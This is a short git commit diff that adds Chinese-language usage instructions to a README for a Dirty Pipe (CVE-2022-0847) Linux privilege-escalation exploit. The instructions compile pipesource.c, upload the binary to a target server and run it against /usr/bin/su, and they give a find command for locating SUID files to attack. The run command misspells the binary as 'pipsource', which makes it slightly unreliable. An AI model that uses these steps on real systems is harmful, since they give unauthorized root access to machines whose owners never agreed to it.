add usage for CVE-2022-0847

This commit is contained in:
helloexp 2023-06-15 14:28:45 +08:00
parent 606f59cd06
commit 01259a5cfc

View File

@ -20,4 +20,8 @@ bash Dirty-Pipe.sh
```shell ```shell
gcc pipesource.c -o pipesource gcc pipesource.c -o pipesource
``` ```
然后直接将 `pipesource` 上传到目标服务器运行 然后直接将 `pipesource` 上传到目标服务器运行 `./pipsource /usr/bin/su`
其中 `/usr/bin/su` 为具有suid 权限的文件
搜索方法如下:
`find / -perm -u=s -type f`